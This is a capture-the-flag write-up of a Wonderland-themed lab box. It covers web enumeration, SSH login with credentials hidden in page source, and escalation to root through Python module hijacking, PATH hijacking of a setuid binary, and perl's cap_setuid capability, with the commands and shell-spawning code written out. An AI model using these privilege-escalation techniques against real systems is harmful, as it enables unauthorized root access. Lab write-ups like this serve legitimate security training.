Starting with nmap we see port 80 immediately jump out at us, so we will also run DIRB to start some HTTP enumeration. Additionally, an SSH (22) service is running. More on that later.
After a "short" time DIRB found http://<IP>/r/a/. I'll admit, this took my longer than it should have to figure out. But given the context of this room, I eventually got to http://<IP>/r/a/b/b/i/t/.
Anytime I land on a webpage during a CTF, the first thing I do is to view the page source.
Here we can see a failed attempt at hiding credentials with "display: none;". Let's try logging onto SSH with this.
Running "ls" you'll notice that the "root.txt" flag is in alice's directory and we don't have permissions to read this file. Taking a look at the hint for the user flag, we see that "Everything is upside down here." Let's see if the user.txt and root.txt flag locations are swapped.
Let's start looking around for privilege escalation opportunities. The first thing I do once I gain access to a shell is to run "sudo -l". This will allow me to see what commands I can run as other users.
Interesting, we can run the python script "walrus_and_the_carpenter.py" as the user rabbit. Running "sudo -la" on this script we can see that we cannot write to this file. Let's grab the content of the script to see exactly what it does.
I've cut out a several of the unnecessary lines of the poem so that you can see the important parts of this script in one screenshot. This script basically imports the python module "random" and prints random parts of this poem.
We can create a file "random.py" in the same directory that this script will import that will run a shell. With just two lines of python we can spawn a shell as the user rabbit.
import os
os.system("/bin/bash")
Execute the walrus script to become the user "rabbit".
Let's perform some enumeration as "rabbit". There are several folders each belonging to a unique user.
Inside rabbit's directory there is a binary called "teaParty" that we can run that is owned by root.
While strings is not installed on this system, we can use grep to achieve a similar result:
grep -a -o -P '[\x20-\x7E]{4,}' myfile.bin
Analyzing this output we can see that the variable "date" is called without an absolute path being specified. We can abuse this by exporting our own "$PATH" by writing a small script with that variable name and running the setuid binary.
First, we must export our path:
export PATH=/tmp:$PATH
echo $PATH
Now, every time a program is called without specifying an absolute path, our shell will first look in /tmp.
Notice that the path variable is now redirected to "/tmp".
Next, let's create our malicious file within /tmp.
touch /tmp/date
chmod +x /tmp/date
Now, add the following contents to our "date" file.
#!/bin/bash
/bin/bash
Now, simply run the "teaParty" binary and obtain the shell of the owner of that binary.
Navigating to the "hatter" directory, we discover hatter's ssh credentials. This is very helpful in the event our machine restarts on us. Or, if we changed the $PATH variable...
At this point it seems necessary to automate further enumeration. We will accomplish this by pulling linpeas.sh from our attacking machine.
Navigate to "/tmp" on the victim machine, host a simple python server on your attacker machine and wget linpeas.sh from your machine.
Once linpeas.sh is on your victim machine execute "chmod +x linpeas.sh" and run the script.
Anytime there is red highlighted in orange within linpeas output we need to pay attention. Below you can see that perl has the cap_setuid+ep set.
Let's see what perl can do for us on https://gtfobins.github.io/.
Because Perl already has cap_setuid+ep we can simply run the last command to spawn a shell as root.
We already know where the root flag is. Simply cat it's contents.
This room was incredibly engaging and made for a fun learning opportunity. I hope this writeup helped you as much as it helped me retain the information!